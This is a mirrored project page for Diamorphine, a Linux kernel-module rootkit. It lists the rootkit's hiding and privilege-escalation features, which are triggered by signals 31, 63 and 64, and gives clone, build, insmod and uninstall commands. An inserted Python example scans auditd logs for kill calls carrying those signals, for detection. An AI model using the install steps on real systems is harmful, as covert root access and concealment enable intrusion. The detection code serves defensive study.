Awesome Open Source

Diamorphine

Diamorphine is an LKM rootkit for Linux kernels 2.6.x/3.x/4.x/5.x and ARM64.

Features

  • When loaded, the module starts invisible;

  • Hide/unhide any process by sending it signal 31;

  • Sending signal 63 (to any pid) makes the module become (in)visible;

  • Sending signal 64 (to any pid) makes the given user become root;

  • Files or directories starting with the MAGIC_PREFIX become invisible;

  • Source: https://awesomeopensource.com/project/m0nad/Diamorphine
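Because every feature above is triggered through kill(2) with signal 31, 63 or 64, those calls are a useful detection point. The following is an added example, not part of the Diamorphine project: it scans auditd SYSCALL records for such calls, assuming an audit rule that logs kill(2) is already in place; the syscall numbers per architecture and the sample records are assumptions constructed for illustration.

```python
import re

# Signal numbers come from the feature list above.
ROOTKIT_SIGNALS = {31: "hide/unhide a process",
                   63: "toggle module visibility",
                   64: "given user becomes root"}
# Assumption: kill(2) syscall number for each audit arch value.
KILL_NR = {"c000003e": 62,    # x86_64
           "c00000b7": 129}   # aarch64
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def suspicious_kills(lines):
    """Return one dict per kill(2) audit record that uses a listed signal."""
    hits = []
    for line in lines:
        rec = {k: v.strip('"') for k, v in FIELD.findall(line)}
        if rec.get("type") != "SYSCALL":
            continue
        try:
            nr = int(rec["syscall"])
            target = int(rec["a0"], 16)            # audit logs arguments in hex
            sig = int(rec["a1"], 16) & 0xFFFFFFFF  # the signal is a 32-bit int
            pid, uid = int(rec["pid"]), int(rec["uid"])
        except (KeyError, ValueError):
            continue                               # malformed or interpreted record
        if KILL_NR.get(rec.get("arch")) != nr or sig not in ROOTKIT_SIGNALS:
            continue
        hits.append({"pid": pid, "uid": uid, "comm": rec.get("comm", "?"),
                     "target": target, "signal": sig,
                     "meaning": ROOTKIT_SIGNALS[sig]})
    return hits

# Constructed sample records (not captured from a real host).
SAMPLE_LOG = [
    'type=SYSCALL msg=audit(1700000000.101:901): arch=c000003e syscall=62 success=yes exit=0 a0=0 a1=3f a2=0 a3=0 items=0 ppid=811 pid=1042 auid=1000 uid=1000 euid=1000 comm="bash" exe="/usr/bin/bash" key="kill"',
    'type=SYSCALL msg=audit(1700000001.202:902): arch=c000003e syscall=62 success=yes exit=0 a0=5dc a1=f a2=0 a3=0 items=0 ppid=811 pid=1042 auid=1000 uid=1000 euid=1000 comm="bash" exe="/usr/bin/bash" key="kill"',
    'type=SYSCALL msg=audit(1700000002.303:903): arch=c000003e syscall=62 success=yes exit=0 a0=0 a1=40 a2=0 a3=0 items=0 ppid=811 pid=1042 auid=1000 uid=1000 euid=1000 comm="bash" exe="/usr/bin/bash" key="kill"',
    'type=SYSCALL msg=audit(1700000003.404:904): arch=c000003e syscall=59 success=yes exit=0 a0=55d0 a1=3f a2=0 a3=0 items=2 ppid=811 pid=1050 auid=1000 uid=1000 euid=1000 comm="ls" exe="/usr/bin/ls" key="exec"',
    'type=SYSCALL msg=audit(1700000004.505:905): arch=c00000b7 syscall=129 success=yes exit=0 a0=4d2 a1=1f a2=0 a3=0 items=0 ppid=700 pid=733 auid=1001 uid=1001 euid=1001 comm="sh" exe="/usr/bin/sh" key="kill"',
]

if __name__ == "__main__":
    for h in suspicious_kills(SAMPLE_LOG):
        print(f'pid={h["pid"]} uid={h["uid"]} comm={h["comm"]} '
              f'sent signal {h["signal"]} to {h["target"]}: {h["meaning"]}')
```

Signals 63 and 64 are real-time signals that ordinary software rarely sends, so hits on them from an interactive shell deserve a closer look; signal 31 is SIGSYS on these architectures and can produce occasional benign matches.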

Install

Verify if the kernel is 2.6.x/3.x/4.x/5.x

uname -r

Clone the repository

git clone https://github.com/m0nad/Diamorphine

Enter the folder

cd Diamorphine

Compile

make

Load the module (as root)

insmod diamorphine.ko

Uninstall

The module starts invisible; to remove it, you first need to make it visible

kill -63 0

Then remove the module (as root)

rmmod diamorphine

References

Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit

Linux Device Drivers http://lwn.net/Kernel/LDD3/

LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

Memset's blog http://memset.wordpress.com/

Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html

WRITING A SIMPLE ROOTKIT FOR LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

Linux Cross Reference http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkits: New Methods for Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/

